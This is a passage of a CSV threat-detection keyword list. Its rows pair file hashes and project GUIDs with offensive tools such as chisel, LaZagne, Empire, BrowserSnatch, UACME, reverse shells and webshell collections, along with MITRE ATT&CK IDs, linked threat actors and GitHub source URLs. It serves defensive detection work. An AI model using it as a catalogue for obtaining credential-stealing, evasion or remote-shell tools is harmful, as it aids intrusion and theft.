#linux","N/A","10","8","717","402","2025-01-24T13:39:57Z","2017-05-12T23:46:28Z","24302" "*3204ad88f0f16fc276bde17e0cdb9c0144789b711e86da88599d193db09ce380*",".{0,1000}3204ad88f0f16fc276bde17e0cdb9c0144789b711e86da88599d193db09ce380.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - 
AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","24304" "*320ed251abc046f440dc0e76d00864d6cf5f65dee61988898d86c18e5513a8c9*",".{0,1000}320ed251abc046f440dc0e76d00864d6cf5f65dee61988898d86c18e5513a8c9.{0,1000}","offensive_tool_keyword","BadWindowsService","An insecurely implemented and installed Windows service for emulating elevation of privileges vulnerabilities","T1068 - T1211 - T1050","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/eladshamir/BadWindowsService","1","0","#filehash","N/A","10","1","58","10","2022-08-25T14:22:25Z","2022-08-19T15:38:05Z","24305" "*320fff4e8283c563cb74e5dc61fd68e4cb2743da27aae20d2b260c6c27e41f00*",".{0,1000}320fff4e8283c563cb74e5dc61fd68e4cb2743da27aae20d2b260c6c27e41f00.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","24306" "*321130ac317775324693046f35bab564fa7dc26e9b6160d5bf990f5ea399b418*",".{0,1000}321130ac317775324693046f35bab564fa7dc26e9b6160d5bf990f5ea399b418.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","24307" 
"*321266cbbd238c3172a32249b3cfb9101d0b29a15c0418e62290d9dc3aace58f*",".{0,1000}321266cbbd238c3172a32249b3cfb9101d0b29a15c0418e62290d9dc3aace58f.{0,1000}","offensive_tool_keyword","Sublist3r","Sublist3r is a python tool designed to enumerate subdomains of websites using OSINT. It helps penetration testers and bug hunters collect and gather subdomains for the domain they are targeting. Sublist3r enumerates subdomains using many search engines such as Google. Yahoo. Bing. Baidu and Ask. Sublist3r also enumerates subdomains using Netcraft. Virustotal. ThreatCrowd. DNSdumpster and ReverseDNS. subbrute was integrated with Sublist3r to increase the possibility of finding more subdomains using bruteforce with an improved wordlist. The credit goes to TheRook who is the author of subbrute.","T1210.001 - T1190 - T1574.001","TA0007 - TA0002 - TA0010","N/A","ENERGETIC BEAR","Reconnaissance","https://github.com/aboul3la/Sublist3r","1","0","#filehash","N/A","5","10","10300","2148","2024-08-02T00:00:30Z","2015-12-15T00:55:25Z","24308" "*32201855814f2d6df4a5803a8eb182fe10e401da90fdbf67c2318c523b4fd619*",".{0,1000}32201855814f2d6df4a5803a8eb182fe10e401da90fdbf67c2318c523b4fd619.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","#filehash","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","24312" "*32221248ee8f748433e89431976294ffa3a62c500e364699cb67fa8471b9c0be*",".{0,1000}32221248ee8f748433e89431976294ffa3a62c500e364699cb67fa8471b9c0be.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","#filehash","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","24313" 
"*32223BE8-3E78-489C-92ED-7900B26DFF43*",".{0,1000}32223BE8\-3E78\-489C\-92ED\-7900B26DFF43.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","24314" "*32224892b670467e23874d7e8abd2ef92987a7e6*",".{0,1000}32224892b670467e23874d7e8abd2ef92987a7e6.{0,1000}","offensive_tool_keyword","PowerLess","PowerShell-based modular backdoor that has been used by Magic Hound group","T1560 - T1217 - T1059.001 - T1005 - T1074.001 - T1140 - T1573 - T1105 - T1056.001","TA0011 - TA0009 - TA0010 - TA0005 - TA0002 - TA0006","N/A","Magic Hound","Malware","https://gist.github.com/farzinenddo/bb1f1ecb56aa9326abc7b47fc99e588e","1","0","#filehash","N/A","10","4","N/A","N/A","N/A","N/A","24315" "*32292398eca5d75150f89d07a622728e52302a73573ec7e1a28268dbe5079ac2*",".{0,1000}32292398eca5d75150f89d07a622728e52302a73573ec7e1a28268dbe5079ac2.{0,1000}","offensive_tool_keyword","rs-shell","rust reverse shell","T1071.004 - T1071.001 - T1573.002 - T1219 - T1059.001 - T1090.003","TA0011 - TA0005 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/BlWasp/rs-shell","1","0","#filehash","N/A","10","10","182","20","2024-09-03T21:48:21Z","2023-06-22T14:10:21Z","24318" "*323791a9dcce15b9b410a9cbbc91296cbccdaeb6198926fbf54c7b159ecd9e03*",".{0,1000}323791a9dcce15b9b410a9cbbc91296cbccdaeb6198926fbf54c7b159ecd9e03.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","24319" "*3243a9062544c25918f589d8dbc60e49295bb60cf906e10b532ae83f7ad8cc12*",".{0,1000}3243a9062544c25918f589d8dbc60e49295bb60cf906e10b532ae83f7ad8cc12.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24321" "*3246bb6e6b258b85286ae566dbde16e6e61c35d21be06a0d03b1aad376efb411*",".{0,1000}3246bb6e6b258b85286ae566dbde16e6e61c35d21be06a0d03b1aad376efb411.{0,1000}","offensive_tool_keyword","BrowserSnatch","steals important data from all chromium and gecko browsers installed in the system and gather the data in a stealer db to be exfiltrated out. 
A powerful Browser Stealer","T1081 - T1074 - T1114 - T1005 - T1041 - T1027","TA0006 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/shaddy43/BrowserSnatch","1","0","#filehash","N/A","10","3","246","39","2025-03-31T21:04:30Z","2024-08-26T18:38:42Z","24322" "*325e02205522272bfa9d390ff16ef35620b45fa9422b851c13e0177c56dfdb1d*",".{0,1000}325e02205522272bfa9d390ff16ef35620b45fa9422b851c13e0177c56dfdb1d.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","24324" "*326D0AB1-CF2F-4A9B-B612-04B62D4EBA89*",".{0,1000}326D0AB1\-CF2F\-4A9B\-B612\-04B62D4EBA89.{0,1000}","offensive_tool_keyword","shutter","The goal of Shutter is to manage windows network stack communication via Windows Filtering Platform. Management can include blocking or permiting traffic based on IP or an executable that initiates or receives the traffic.","T1562 - T1027","TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/dsnezhkov/shutter","1","0","#GUIDproject","N/A","10","2","116","15","2021-05-12T19:05:14Z","2021-05-12T18:51:03Z","24327" "*326d52ca3b8d610e573b195adb1af8025412c5557434ad7851eb2bb23bded779*",".{0,1000}326d52ca3b8d610e573b195adb1af8025412c5557434ad7851eb2bb23bded779.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","24328" 
"*326e22bdce3db54f97f230ad600f03908f9a582944d481f293cd7013ce2e8567*",".{0,1000}326e22bdce3db54f97f230ad600f03908f9a582944d481f293cd7013ce2e8567.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","24329" "*326e22bdce3db54f97f230ad600f03908f9a582944d481f293cd7013ce2e8567*",".{0,1000}326e22bdce3db54f97f230ad600f03908f9a582944d481f293cd7013ce2e8567.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","24330" "*326e22bdce3db54f97f230ad600f03908f9a582944d481f293cd7013ce2e8567*",".{0,1000}326e22bdce3db54f97f230ad600f03908f9a582944d481f293cd7013ce2e8567.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","24331" 
"*32858fab2bfbbde5516cdcf181d96b25960071b1516fec04b03f96d2fa5395d7*",".{0,1000}32858fab2bfbbde5516cdcf181d96b25960071b1516fec04b03f96d2fa5395d7.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/mitchmoser/SharpShares","1","0","#filehash","N/A","10","4","351","49","2021-09-21T08:14:27Z","2020-09-25T22:35:57Z","24336" "*329797f116972ec9d9ef719592d687908a2dd4bd5066900bee5452225ca8beb3*",".{0,1000}329797f116972ec9d9ef719592d687908a2dd4bd5066900bee5452225ca8beb3.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","24338" "*329a409b807991c382c0ca408581264c8e092defd38336e599a2a1411d4b4383*",".{0,1000}329a409b807991c382c0ca408581264c8e092defd38336e599a2a1411d4b4383.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","24339" "*32a194633e4fb7143e68bdc59a8b1688819b286ea17a069605728bcf08fd357b*",".{0,1000}32a194633e4fb7143e68bdc59a8b1688819b286ea17a069605728bcf08fd357b.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","24340" "*32A26CB8E0ECA88CA6116E467FC8BD5430E54133A5642ED1AFED8DCC2B9C9DFD*",".{0,1000}32A26CB8E0ECA88CA6116E467FC8BD5430E54133A5642ED1AFED8DCC2B9C9DFD.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","#filehash","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","24341" "*32a53f3d4ecb4456372191071783bcaf9fd95ae442722202d7fd52b3da9b89d3*",".{0,1000}32a53f3d4ecb4456372191071783bcaf9fd95ae442722202d7fd52b3da9b89d3.{0,1000}","offensive_tool_keyword","no_defender","disable windows defender. 
(through the WSC api)","T1089","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/es3n1n/no-defender","1","0","#filehash","N/A","10","10","1907","13","2024-06-08T01:29:18Z","2024-05-23T05:18:38Z","24343" "*32abb6de73930ce62b7110f0834327b96444fb25939b2ffc4af153faac836d84*",".{0,1000}32abb6de73930ce62b7110f0834327b96444fb25939b2ffc4af153faac836d84.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24345" "*32ae965a0b8ea94499ffb0368ae4d5a349f84c5b37ba3cba1874d0bd73dc650c*",".{0,1000}32ae965a0b8ea94499ffb0368ae4d5a349f84c5b37ba3cba1874d0bd73dc650c.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","#filehash","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","24346" "*32c3b62e05eb08f482b00ca28bca9b43d743048f287e9b42193df91d6ddcd09a*",".{0,1000}32c3b62e05eb08f482b00ca28bca9b43d743048f287e9b42193df91d6ddcd09a.{0,1000}","offensive_tool_keyword","ShellPwnsh","Reverse Shell in Golang and PowerShell Fud","T1059.001 - T1573.002 - T1105","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/BlackShell256/ShellPwnsh","1","0","#filehash","N/A","9","10","9","6","2022-05-01T08:42:54Z","2022-04-28T01:26:08Z","24348" "*32ca6ae0de534fa368856fdec13bf2f5ca97879f1e50d5b789c5c0dff5081150*",".{0,1000}32ca6ae0de534fa368856fdec13bf2f5ca97879f1e50d5b789c5c0dff5081150.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24349" "*32ccdc0e660f56052d82e4e5788c7d555d7dfcf00d3949dfd98d69a9803619c0*",".{0,1000}32ccdc0e660f56052d82e4e5788c7d555d7dfcf00d3949dfd98d69a9803619c0.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","#filehash","commands cheat 
sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","24350" "*32cd84b8c8e4df09df5aaf0c310a954d18b2cc96aaea2ca524b79f381afd3e55*",".{0,1000}32cd84b8c8e4df09df5aaf0c310a954d18b2cc96aaea2ca524b79f381afd3e55.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","24351" "*32cd91c759b8cb4efca9582ee8ff760f1121f109a5e54a6c6da956713ef81f0f*",".{0,1000}32cd91c759b8cb4efca9582ee8ff760f1121f109a5e54a6c6da956713ef81f0f.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - 
CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","24352" "*32CE1CB1-B7D9-416F-8EFE-6A0055867537*",".{0,1000}32CE1CB1\-B7D9\-416F\-8EFE\-6A0055867537.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","24353" "*32ce854a87a19f1e5caee7ae16dddd79d2877da1abeb6ff5c44a879708d6ab32*",".{0,1000}32ce854a87a19f1e5caee7ae16dddd79d2877da1abeb6ff5c44a879708d6ab32.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","24354" "*32d12ed0ff8db1c95d1ee507561ee0db4c36200277a2bc4cd1b643e385ff5ebe*",".{0,1000}32d12ed0ff8db1c95d1ee507561ee0db4c36200277a2bc4cd1b643e385ff5ebe.{0,1000}","offensive_tool_keyword","tsh-go","Tiny SHell Go - An open-source backdoor written in Go","T1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009","TA0003 - TA0005 - TA0011 - TA0010","N/A","N/A","Persistence","https://github.com/CykuTW/tsh-go","1","0","#filehash","N/A","10","2","161","16","2024-08-29T02:59:37Z","2022-06-13T16:25:30Z","24355" "*32d18b1f5e53d194a9875e279d9a9ce2c8beb912f53f38877ec61bef2cb49bec*",".{0,1000}32d18b1f5e53d194a9875e279d9a9ce2c8beb912f53f38877ec61bef2cb49bec.{0,1000}","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0005 - TA0004","N/A","Evilnum","Defense 
Evasion","https://github.com/hfiref0x/UACME","1","0","#filehash","N/A","10","10","6711","1348","2025-03-09T03:33:26Z","2015-03-28T12:04:33Z","24356" "*32d4ef57fb08b0312045fd5f521a857f42019c4edfd21757bfc2d5dd2d4f0254*",".{0,1000}32d4ef57fb08b0312045fd5f521a857f42019c4edfd21757bfc2d5dd2d4f0254.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24357" "*32d7996430dea9678208a61548f252f111eea644b325f9a7c2d1bce89e1cbf90*",".{0,1000}32d7996430dea9678208a61548f252f111eea644b325f9a7c2d1bce89e1cbf90.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","24358" "*32db0ad0f6cdbdd9481c02062ed78535bd65185331a7ae6b198e3e5eb6b5a59a*",".{0,1000}32db0ad0f6cdbdd9481c02062ed78535bd65185331a7ae6b198e3e5eb6b5a59a.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","24359" "*32dca4493f6efae39b557be6803c241f7d88f7871f0fb5fde9c4ea0175d77518*",".{0,1000}32dca4493f6efae39b557be6803c241f7d88f7871f0fb5fde9c4ea0175d77518.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24361" "*32e0f5302e5f96eebb6d3b5c4492521713f4dfe4b377a300a5313533c070b62f*",".{0,1000}32e0f5302e5f96eebb6d3b5c4492521713f4dfe4b377a300a5313533c070b62f.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24363" "*32e696d3b380f40adea08a359da80575df34f9130b392f10666fdff9e443769e*",".{0,1000}32e696d3b380f40adea08a359da80575df34f9130b392f10666fdff9e443769e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24364" "*32e852ed61681e0f498dfd901863b26277f5f0313e4469b4243991be4f3bea07*",".{0,1000}32e852ed61681e0f498dfd901863b26277f5f0313e4469b4243991be4f3bea07.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24365" "*32f5aea45557a6aeec3a769c774b105805828aaaa5ceca7b0b3304e0c7f99894*",".{0,1000}32f5aea45557a6aeec3a769c774b105805828aaaa5ceca7b0b3304e0c7f99894.{0,1000}","offensive_tool_keyword","EarthWorm","SOCKS v5 proxy service used for data forwarding in complex network environments","T1090.002 - T1573.001 - T1095","TA0010 - TA0008 - TA0011","N/A","APT27 - APT15 - Calypso - Earth Lusca - Worok","C2","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","24368" "*32f5aea45557a6aeec3a769c774b105805828aaaa5ceca7b0b3304e0c7f99894*",".{0,1000}32f5aea45557a6aeec3a769c774b105805828aaaa5ceca7b0b3304e0c7f99894.{0,1000}","offensive_tool_keyword","EarthWorm","SOCKS v5 proxy service used for data forwarding in complex network environments","T1090.002 - T1573.001 - T1095","TA0010 - TA0008 - TA0011","N/A","APT27 - APT15 - Calypso - Earth Lusca - Worok","C2","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","24369" "*330253612d4c4a3791acfd82257d5a4c1e68ec989e0647abfa4baa560cf0a046*",".{0,1000}330253612d4c4a3791acfd82257d5a4c1e68ec989e0647abfa4baa560cf0a046.{0,1000}","offensive_tool_keyword","CDK","CDK 
